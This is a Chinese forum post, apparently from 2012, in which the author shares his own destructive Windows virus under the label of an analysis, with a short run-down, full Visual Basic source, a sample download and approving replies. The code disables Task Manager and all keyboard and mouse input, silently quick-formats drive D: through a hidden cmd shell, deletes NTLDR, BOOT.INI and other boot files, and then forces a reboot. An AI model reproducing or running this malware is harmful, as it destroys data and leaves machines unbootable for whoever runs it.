震动波病毒分析 by DuckSoftHacker

ducksofthacker · 发表于 2012-2-6 09:43

本帖最后由 ducksofthacker 于 2012-2-6 09:47 编辑

这个病毒是我在学校机房时候的处女作，现在来到了52破解，来给大家分享下。

该病毒运行流程：
1.首先采用独占方式以文件方式打开任务管理器，使其无效化。
2.然后调用API BlockInput，使键盘鼠标无效化。如果单纯用BlockInput是有解的，按任务管理器出来就好了。但是已经禁用了，所以无解。
3.使用隐藏方式调用Windows的format.exe格盘，并在PC喇叭播放难听的随机噪声。
4.调用KillFile子程序，设置属性到普通后可以正常删除，把Windows NT/2000/XP/2003系列的启动文件删的一干二净，然后3秒后重启。

快镜头(亲身虚拟机实验)：
突然鼠标键盘失灵，按任务管理器，Ctrl+Break都不好使。然后电脑机箱喇叭出现了奇怪的噪声，持续一段时间后系统黑屏重启。重启后发现开机出现NTLDR is missing，无法进入系统。

源代码：
Dim mlnghDir As Long
Private Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal PassZero As Long, ByVal dwCreationDisposition As Long, ByVal dwFlagsAndAttributes As Long, ByVal PassZero As Long) As Long
Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Const OPEN_EXISTING = 3
Private Const FILE_FLAG_BACKUP_SEMANTICS = &H2000000
Private Const GENERIC_READ = &H80000000
Private Declare Function BlockInput Lib "user32" (ByVal fBlockIt As Long) As Long
Private Declare Function Beep Lib "kernel32" (ByVal dwFreq As Long, ByVal dwDuration As Long) As Long
'病毒名: 震动波病毒
'功能 : - 毁灭XP、2003、NT系列系统
' - 格盘
' - PC喇叭毁灭
' - 键鼠挂崩
' - 禁用任务管理器
'作者 : DuckSoftHacker
Sub Main()
'--------------------------------------------------------------
'| -------病毒配置区------- |
'| 严谨违法使用 |
'--------------------------------------------------------------
'-----------------------以下为功能区---------------------------
禁用任务管理器
键鼠失灵
格盘 "D:"
PC喇叭失灵 60
毁灭XP
'-----------------------以上为功能区---------------------------
'--------------------------------------------------------------
'|禁用: 在命令前加 ' (英文单引号) |启用: 去掉单引号|免杀兄制作|
'--------------------------------------------------------------
End Sub

'--------------------------------------分界线----------------------------------------
Sub 毁灭XP()
'慎用！无法挽救！
KillFile "C:\NTLDR"
KillFile "C:\NTDETECT.COM"
KillFile "C:\BOOTFONT.BIN"
KillFile "C:\BOOT.INI"
KillFile "C:\GHLDR"
Shell "shutdown -r -t 3"
End Sub
Sub PC喇叭失灵(次数 As Long)
For a = 1 To 次数
Beep 1000 + CLng(Rnd * 3000), Int(100 * Rnd)
Next
End Sub
Sub 键鼠失灵()
BlockInput True
End Sub
Sub 格盘(盘符 As String)
'超级邪恶,呵呵！
Shell "cmd.exe /c format " & 盘符 & " /q", vbHide
End Sub
Sub LockFile(ByVal FilePath As String) '锁定文件
mlnghDir = CreateFile(FilePath, GENERIC_READ, ByVal 0&, ByVal 0&, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, ByVal 0&)
End Sub
Sub 禁用任务管理器()
LockFile "C:\Windows\System32\taskmgr.exe"
End Sub
Sub KillFile(file As String)
On error resume next
SetAttr file,vbNormal
Kill file
End Sub

病毒样本，仅供测试：

震动波病毒Ⅱ代.rar (2.3 KB, 下载次数: 92)

希望各位大牛踊跃评论，小菜鸟感激不尽。

VIPLZM · 发表于 2012-2-6 10:35

Good，希望论坛有更多像你这样的人

657580890 · 发表于 2012-2-6 20:16

看看不错不错

virusdefender · 发表于 2012-2-6 20:57

刚在卡饭上看见一篇一模一样的文章。

破解入门 · 发表于 2012-2-6 22:06

哈哈哈哈

ducksofthacker · 发表于 2012-2-6 22:42

virusdefender 发表于 2012-2-6 20:57
刚在卡饭上看见一篇一模一样的文章。

原创，纯属巧合

ducksofthacker · 发表于 2012-2-7 12:48

转的很快嘛连我的版权都没擦掉

levil · 发表于 2012-2-7 14:47

支持分享思路，大家实验的时候要小心

bigkat · 发表于 2012-2-8 11:58

只要是自己研究过的，哪怕前人已经出过。也是好的

无名智者 · 发表于 2012-3-5 13:28

你的文章被迅速转到了卡饭

我看了下，一模一样

帐号		自动登录	找回密码
密码			注册[Register]

[PC样本分析] 震动波病毒分析 by DuckSoftHacker

免费评分

个人中心